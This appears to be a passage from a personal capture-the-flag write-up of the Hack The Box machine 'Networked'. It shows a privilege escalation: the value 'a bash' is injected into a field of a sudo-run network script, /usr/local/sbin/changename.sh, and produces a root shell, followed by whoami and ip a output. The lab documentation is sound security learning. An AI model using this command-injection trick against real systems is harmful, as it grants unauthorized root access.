InfoSec LAB

OS Command Injection

As discovered earlier, I am able to get a system level code execution through the sudo privileges

[guly@networked ~]$ sudo -u root /usr/local/sbin/changename.sh
interface name:
a
a
interface proxy_method:
a
a
interface browser_only:
a
a
interface bootproto:
a bash
a bash
[root@networked network-scripts]# whoami
root
[root@networked network-scripts]# hostname
networked.htb
[root@networked network-scripts]# ip a
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1000
    link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
    inet 127.0.0.1/8 scope host lo
       valid_lft forever preferred_lft forever
    inet6 ::1/128 scope host 
       valid_lft forever preferred_lft forever
2: eth0: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc pfifo_fast state UP group default qlen 1000
    link/ether 00:50:56:b9:99:2f brd ff:ff:ff:ff:ff:ff
    inet 10.10.10.146/24 brd 10.10.10.255 scope global eth0
       valid_lft forever preferred_lft forever
    inet6 dead:beef::250:56ff:feb9:992f/64 scope global mngtmpaddr dynamic 
       valid_lft 86399sec preferred_lft 14399sec
    inet6 fe80::250:56ff:feb9:992f/64 scope link 
       valid_lft forever preferred_lft forever

System Level Compromise

InfoSec LAB

Explorer

Networked_Privilege_Escalation

OS Command Injection

Interactive Graph View

Backlinks